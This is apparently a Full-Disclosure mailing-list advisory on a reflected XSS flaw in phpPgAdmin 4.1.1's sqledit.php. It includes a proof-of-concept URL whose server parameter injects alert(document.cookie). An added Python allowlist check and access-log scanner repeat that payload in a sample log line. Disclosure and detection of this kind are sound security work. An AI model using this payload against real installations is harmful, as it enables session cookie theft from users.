[Full-disclosure] phpPgAdmin XSS Vulnerability

Michal Majchrowicz m.majchrowicz at gmail.com
Wed May 23 00:28:59 BST 2007


There is a JavaScript code injection in phpPgAdmin, which fails to correctly
sanitize user-supplied data. As a result, a very simple XSS is possible. This
was tested on phpPgAdmin 4.1.1 as a not-logged-in user.
PoC:
https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow');alert(document.cookie);alert('phpPgAdmin%204.1.1%20XSS%20Vulnerability');//
Regards, Michal Majchrowicz.
Hack.pl
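Added defender-side example, not part of the original post: an allowlist check for the `server` parameter and a scan of constructed access-log lines that flags the PoC above. The `host:port:sslmode` shape of the parameter is an assumption inferred from the PoC value `:5432:allow`.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Expected shape of phpPgAdmin's "server" selector. ASSUMPTION: the
# host:port:sslmode layout is inferred from the PoC value ":5432:allow";
# the host part may be empty (local socket) and the port is numeric.
SERVER_RE = re.compile(r"^[A-Za-z0-9.\-]*:\d{1,5}:(allow|prefer|require|disable)$")

def server_param_is_valid(decoded_value):
    """Allowlist check: True only for a plain host:port:sslmode value.
    Quotes, parentheses and semicolons, which the sqledit.php payload
    relies on to break out of the JavaScript string, all fail here."""
    return SERVER_RE.fullmatch(decoded_value) is not None

def query_params(query):
    """Decode a query string into {name: [values]} without parse_qs,
    whose ';' handling differs across Python versions."""
    params = {}
    for pair in query.split("&"):
        if pair:
            key, _, val = pair.partition("=")
            params.setdefault(unquote_plus(key), []).append(unquote_plus(val))
    return params

def scan_access_log(lines):
    """Return (client_ip, decoded server value) for each request to
    sqledit.php whose server= parameter does not fit the allowlist."""
    findings = []
    for line in lines:
        m = re.match(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"', line)
        if not m:
            continue
        parts = urlsplit(m.group(2))
        if not parts.path.endswith("/sqledit.php"):
            continue
        for value in query_params(parts.query).get("server", []):
            if not server_param_is_valid(value):
                findings.append((m.group(1), value))
    return findings

# Constructed sample lines in Apache combined-log style; the second one
# carries the query string from the advisory's PoC URL.
SAMPLE_LOG = [
    '10.0.0.5 - - [23/May/2007:00:28:59 +0100] "GET /phpPgAdmin/sqledit.php?server=localhost%3A5432%3Aallow HTTP/1.1" 200 5120',
    '10.0.0.9 - - [23/May/2007:00:29:10 +0100] "GET /phpPgAdmin/sqledit.php?server=%3A5432%3Aallow\');alert(document.cookie);alert(\'phpPgAdmin%204.1.1%20XSS%20Vulnerability\');// HTTP/1.1" 200 5120',
    '10.0.0.5 - - [23/May/2007:00:30:00 +0100] "GET /phpPgAdmin/index.php HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, value in scan_access_log(SAMPLE_LOG):
        print(f"suspicious server= from {ip}: {value!r}")
```

The same allowlist, applied before the value is echoed into the page, is the input-side half of a fix; the output side is still escaping the value for the JavaScript context it lands in.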


Full-Disclosure is hosted and sponsored by Secunia.